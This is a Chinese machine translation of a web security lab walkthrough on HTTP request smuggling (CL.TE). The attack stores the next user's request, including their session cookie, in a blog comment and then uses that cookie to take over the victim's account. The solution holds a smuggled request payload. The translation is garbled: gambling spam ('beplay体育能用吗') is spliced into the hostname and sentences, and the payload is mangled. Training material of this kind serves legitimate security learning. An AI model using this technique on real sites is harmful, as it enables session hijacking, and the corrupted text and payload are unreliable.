实验室:利用HTTP请求走私以捕获其他用户的请求
从业者
该实验室涉及前端和后端服务器,并且前端服务器不支持块状编码。
要求解实验室,请将请求走私到后端服务器,这会导致下一个用户的请求存储在应用程序中。然后检索下一个用户的请求,然后使用受害者用户的cookie访问其帐户。
笔记
实验室模拟受害者用户的活动。您向实验室提出的每几个帖子请求,受害者用户都会提出自己的请求。您可能需要几次重复攻击,以确保受害者用户的要求根据需要出现。
提示
在请求走私攻击中,手动修复长度字段可能很棘手。我们的HTTP请求走私者Burp扩展旨在帮助。您可以通过BAPP商店安装它。
解决方案
- 访问博客文章并发表评论。
- 发送
评论台
请求打burp repeater,洗牌的身体参数,以便评论
参数是最后一次发生的,并确保其仍然有效。
增加评论台
要求内容长度
到400,然后将其走私到后端服务器:
post/http/1.1主机:您的lab-id.web-securbeplay体育能用吗ity-academy.net content-type:application/x-www-form-urlencoded content-Length:256传输编码:块0 post/post/post/prosp/comment httpp/1.1 content-type:application/x-www-form-urlencoded content Length:400 cookie:session = your-session-toble-token csrf = your-csrf-token&postid&postid&postid = 5&name = carlos+montoya&emaim beplay体育能用吗y montoya&email = carlos = carlos = carlos = carlos = carlos = carlos ==&评论=测试
- 查看博客文章以查看是否有包含用户请求的评论。请注意,目标用户只会间歇性地浏览该网站,因此您可能需要在成功之前几次重复此攻击。beplay体育能用吗
- 从评论中复制用户的cookie标头,并使用它访问其帐户。
笔记
如果存储的请求不完整并且不包括cookie标头,则需要在捕获整个cookie之前慢慢增加内容长度标头的值。
社区解决方案beplay维护得多久
迈克尔·索默(Michael Sommer)